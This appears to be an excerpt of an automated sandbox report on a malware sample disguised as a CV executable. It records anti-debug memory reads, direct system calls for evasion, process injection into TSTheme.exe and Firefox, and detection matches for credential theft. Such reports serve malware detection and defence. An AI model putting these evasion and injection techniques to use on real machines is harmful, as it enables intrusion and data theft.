Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F4859 mov eax, dword ptr fs:[00000030h]		2_2_014F4859
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F4859 mov eax, dword ptr fs:[00000030h]		2_2_014F4859
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0157E872 mov eax, dword ptr fs:[00000030h]		2_2_0157E872
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0157E872 mov eax, dword ptr fs:[00000030h]		2_2_0157E872
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01586870 mov eax, dword ptr fs:[00000030h]		2_2_01586870
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01586870 mov eax, dword ptr fs:[00000030h]		2_2_01586870
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0157C810 mov eax, dword ptr fs:[00000030h]		2_2_0157C810
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152A830 mov eax, dword ptr fs:[00000030h]		2_2_0152A830
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0159483A mov eax, dword ptr fs:[00000030h]		2_2_0159483A
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0159483A mov eax, dword ptr fs:[00000030h]		2_2_0159483A
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01512835 mov eax, dword ptr fs:[00000030h]		2_2_01512835
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01512835 mov eax, dword ptr fs:[00000030h]		2_2_01512835
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01512835 mov eax, dword ptr fs:[00000030h]		2_2_01512835
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01512835 mov ecx, dword ptr fs:[00000030h]		2_2_01512835
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01512835 mov eax, dword ptr fs:[00000030h]		2_2_01512835
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01512835 mov eax, dword ptr fs:[00000030h]		2_2_01512835
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0151E8C0 mov eax, dword ptr fs:[00000030h]		2_2_0151E8C0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015C08C0 mov eax, dword ptr fs:[00000030h]		2_2_015C08C0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152C8F9 mov eax, dword ptr fs:[00000030h]		2_2_0152C8F9
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152C8F9 mov eax, dword ptr fs:[00000030h]		2_2_0152C8F9
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015BA8E4 mov eax, dword ptr fs:[00000030h]		2_2_015BA8E4
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F0887 mov eax, dword ptr fs:[00000030h]		2_2_014F0887
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0157C89D mov eax, dword ptr fs:[00000030h]		2_2_0157C89D
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0159EB50 mov eax, dword ptr fs:[00000030h]		2_2_0159EB50
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015C2B57 mov eax, dword ptr fs:[00000030h]		2_2_015C2B57
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015C2B57 mov eax, dword ptr fs:[00000030h]		2_2_015C2B57
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015C2B57 mov eax, dword ptr fs:[00000030h]		2_2_015C2B57
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015C2B57 mov eax, dword ptr fs:[00000030h]		2_2_015C2B57
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015A4B4B mov eax, dword ptr fs:[00000030h]		2_2_015A4B4B
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015A4B4B mov eax, dword ptr fs:[00000030h]		2_2_015A4B4B
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01586B40 mov eax, dword ptr fs:[00000030h]		2_2_01586B40
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01586B40 mov eax, dword ptr fs:[00000030h]		2_2_01586B40
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015BAB40 mov eax, dword ptr fs:[00000030h]		2_2_015BAB40
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01598B42 mov eax, dword ptr fs:[00000030h]		2_2_01598B42
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014E8B50 mov eax, dword ptr fs:[00000030h]		2_2_014E8B50
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014ECB7E mov eax, dword ptr fs:[00000030h]		2_2_014ECB7E
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0156EB1D mov eax, dword ptr fs:[00000030h]		2_2_0156EB1D
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0156EB1D mov eax, dword ptr fs:[00000030h]		2_2_0156EB1D
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0156EB1D mov eax, dword ptr fs:[00000030h]		2_2_0156EB1D
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0156EB1D mov eax, dword ptr fs:[00000030h]		2_2_0156EB1D
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0156EB1D mov eax, dword ptr fs:[00000030h]		2_2_0156EB1D
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0156EB1D mov eax, dword ptr fs:[00000030h]		2_2_0156EB1D
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0156EB1D mov eax, dword ptr fs:[00000030h]		2_2_0156EB1D
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0156EB1D mov eax, dword ptr fs:[00000030h]		2_2_0156EB1D
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0156EB1D mov eax, dword ptr fs:[00000030h]		2_2_0156EB1D
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015C4B00 mov eax, dword ptr fs:[00000030h]		2_2_015C4B00
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0151EB20 mov eax, dword ptr fs:[00000030h]		2_2_0151EB20
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0151EB20 mov eax, dword ptr fs:[00000030h]		2_2_0151EB20
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015B8B28 mov eax, dword ptr fs:[00000030h]		2_2_015B8B28
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015B8B28 mov eax, dword ptr fs:[00000030h]		2_2_015B8B28
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F0BCD mov eax, dword ptr fs:[00000030h]		2_2_014F0BCD
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F0BCD mov eax, dword ptr fs:[00000030h]		2_2_014F0BCD
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F0BCD mov eax, dword ptr fs:[00000030h]		2_2_014F0BCD
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0159EBD0 mov eax, dword ptr fs:[00000030h]		2_2_0159EBD0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01510BCB mov eax, dword ptr fs:[00000030h]		2_2_01510BCB
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01510BCB mov eax, dword ptr fs:[00000030h]		2_2_01510BCB
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01510BCB mov eax, dword ptr fs:[00000030h]		2_2_01510BCB
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0157CBF0 mov eax, dword ptr fs:[00000030h]		2_2_0157CBF0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0151EBFC mov eax, dword ptr fs:[00000030h]		2_2_0151EBFC
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F8BF0 mov eax, dword ptr fs:[00000030h]		2_2_014F8BF0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F8BF0 mov eax, dword ptr fs:[00000030h]		2_2_014F8BF0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F8BF0 mov eax, dword ptr fs:[00000030h]		2_2_014F8BF0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015A4BB0 mov eax, dword ptr fs:[00000030h]		2_2_015A4BB0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_015A4BB0 mov eax, dword ptr fs:[00000030h]		2_2_015A4BB0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01500BBE mov eax, dword ptr fs:[00000030h]		2_2_01500BBE
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01500BBE mov eax, dword ptr fs:[00000030h]		2_2_01500BBE
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01500A5B mov eax, dword ptr fs:[00000030h]		2_2_01500A5B
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01500A5B mov eax, dword ptr fs:[00000030h]		2_2_01500A5B
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F6A50 mov eax, dword ptr fs:[00000030h]		2_2_014F6A50
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F6A50 mov eax, dword ptr fs:[00000030h]		2_2_014F6A50
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F6A50 mov eax, dword ptr fs:[00000030h]		2_2_014F6A50
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F6A50 mov eax, dword ptr fs:[00000030h]		2_2_014F6A50
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F6A50 mov eax, dword ptr fs:[00000030h]		2_2_014F6A50
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F6A50 mov eax, dword ptr fs:[00000030h]		2_2_014F6A50
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F6A50 mov eax, dword ptr fs:[00000030h]		2_2_014F6A50
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0156CA72 mov eax, dword ptr fs:[00000030h]		2_2_0156CA72
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0156CA72 mov eax, dword ptr fs:[00000030h]		2_2_0156CA72
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0159EA60 mov eax, dword ptr fs:[00000030h]		2_2_0159EA60
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152CA6F mov eax, dword ptr fs:[00000030h]		2_2_0152CA6F
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152CA6F mov eax, dword ptr fs:[00000030h]		2_2_0152CA6F
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152CA6F mov eax, dword ptr fs:[00000030h]		2_2_0152CA6F
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0157CA11 mov eax, dword ptr fs:[00000030h]		2_2_0157CA11
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01514A35 mov eax, dword ptr fs:[00000030h]		2_2_01514A35
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01514A35 mov eax, dword ptr fs:[00000030h]		2_2_01514A35
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152CA38 mov eax, dword ptr fs:[00000030h]		2_2_0152CA38
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152CA24 mov eax, dword ptr fs:[00000030h]		2_2_0152CA24
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0151EA2E mov eax, dword ptr fs:[00000030h]		2_2_0151EA2E
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01524AD0 mov eax, dword ptr fs:[00000030h]		2_2_01524AD0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01524AD0 mov eax, dword ptr fs:[00000030h]		2_2_01524AD0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01546ACC mov eax, dword ptr fs:[00000030h]		2_2_01546ACC
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01546ACC mov eax, dword ptr fs:[00000030h]		2_2_01546ACC
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01546ACC mov eax, dword ptr fs:[00000030h]		2_2_01546ACC
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014F0AD0 mov eax, dword ptr fs:[00000030h]		2_2_014F0AD0
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152AAEE mov eax, dword ptr fs:[00000030h]		2_2_0152AAEE
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_0152AAEE mov eax, dword ptr fs:[00000030h]		2_2_0152AAEE
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_01528A90 mov edx, dword ptr fs:[00000030h]		2_2_01528A90
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014FEA80 mov eax, dword ptr fs:[00000030h]		2_2_014FEA80
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Code function: 2_2_014FEA80 mov eax, dword ptr fs:[00000030h]		2_2_014FEA80

Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtWriteVirtualMemory: Direct from: 0x77762E3C			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtMapViewOfSection: Direct from: 0x77762D1C			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtNotifyChangeKey: Direct from: 0x77763C2C			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtCreateMutant: Direct from: 0x777635CC			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtResumeThread: Direct from: 0x777636AC			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtQuerySystemInformation: Direct from: 0x77762DFC			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtAllocateVirtualMemory: Direct from: 0x77762BFC			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtReadFile: Direct from: 0x77762ADC			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtDelayExecution: Direct from: 0x77762DDC			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtWriteVirtualMemory: Direct from: 0x7776490C			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtQueryInformationProcess: Direct from: 0x77762C26			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtResumeThread: Direct from: 0x77762FBC			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtCreateUserProcess: Direct from: 0x7776371C			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtSetInformationThread: Direct from: 0x777563F9			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtOpenKeyEx: Direct from: 0x77763C9C			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtSetInformationThread: Direct from: 0x77762B4C			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtQueryAttributesFile: Direct from: 0x77762E6C			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtReadVirtualMemory: Direct from: 0x77762E8C			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtCreateKey: Direct from: 0x77762C6C			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtQuerySystemInformation: Direct from: 0x777648CC			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtAllocateVirtualMemory: Direct from: 0x777648EC			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtQueryVolumeInformationFile: Direct from: 0x77762F2C			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtOpenSection: Direct from: 0x77762E0C			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtDeviceIoControlFile: Direct from: 0x77762AEC			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtQueryValueKey: Direct from: 0x77762BEC			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtQueryInformationToken: Direct from: 0x77762CAC			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtTerminateThread: Direct from: 0x77762FCC			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtCreateFile: Direct from: 0x77762FEC			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtOpenFile: Direct from: 0x77762DCC			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtOpenKeyEx: Direct from: 0x77762B9C			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtSetInformationProcess: Direct from: 0x77762C5C			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	NtProtectVirtualMemory: Direct from: 0x77762F9C			Jump to behavior

Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe

Memory written: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Section loaded: NULL target: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Section loaded: NULL target: C:\Windows\SysWOW64\TSTheme.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Section loaded: NULL target: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Section loaded: NULL target: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write			Jump to behavior

Source: C:\Windows\SysWOW64\TSTheme.exe

Thread register set: target process: 7720

Jump to behavior

Source: C:\Windows\SysWOW64\TSTheme.exe

Thread APC queued: target process: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe

Jump to behavior

Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Process created: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe "C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe"			Jump to behavior
Source: C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe	Process created: C:\Windows\SysWOW64\TSTheme.exe "C:\Windows\SysWOW64\TSTheme.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\TSTheme.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"			Jump to behavior

Source: OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000002.3661823066.00000000016A0000.00000002.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000000.1378781194.00000000016A0000.00000002.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000000.1533153178.0000000000CE1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000002.3661823066.00000000016A0000.00000002.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000000.1378781194.00000000016A0000.00000002.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000000.1533153178.0000000000CE1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000002.3661823066.00000000016A0000.00000002.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000000.1378781194.00000000016A0000.00000002.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000000.1533153178.0000000000CE1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000002.3661823066.00000000016A0000.00000002.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000000.1378781194.00000000016A0000.00000002.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000000.1533153178.0000000000CE1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection

Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Queries volume information: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Source: Yara match	File source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.unpack, type: UNPACKEDPE
